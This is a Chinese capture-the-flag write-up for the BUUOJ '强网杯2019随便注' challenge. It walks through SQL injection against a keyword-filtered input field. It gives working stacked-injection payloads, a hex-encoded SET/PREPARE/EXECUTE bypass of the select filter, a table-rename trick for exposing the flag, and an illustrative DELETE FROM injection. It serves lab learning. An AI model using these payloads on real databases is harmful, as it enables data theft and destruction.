buuoj强网杯2019随便注
打开环境:
查看源码:
说明sqlmap行不通。
返回页面
依次输入:
1
1'
1' #
1’ order by 2 #
发现可以正常显示,注入题,并且爆出了字段数。
输入select
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
过滤掉了这些关键词。
使用堆叠注入试试;
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。
1';show databases; #
1';show tables; #
发现堆叠注入出现了数据库名和表名
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
目的为查询出表1919810931114514中的信息
1';show columns from `1919810931114514`;#
可知flag字段的值即为目的
解法1:
因为select被过滤了,所以先将select * from 1919810931114514
进行16进制编码
再通过构造payload,得1’;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
进而得到flag
SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值,如下:
复制代码 代码如下:
SELECT @VAR1=‘Y’,@VAR2=‘N’
– 而SET要达到同样的效果,需要:
SET @VAR1=‘Y’
SET @VAR2=‘N’
prepare…from…是预处理语句,会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句
解法2:
1’;rename tables words
to words1
;rename tables 1919810931114514
to words
; alter table words
change flag
id
varchar(100);#
这段代码的意思是将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id
然后用1’ or 1=1 #得到flag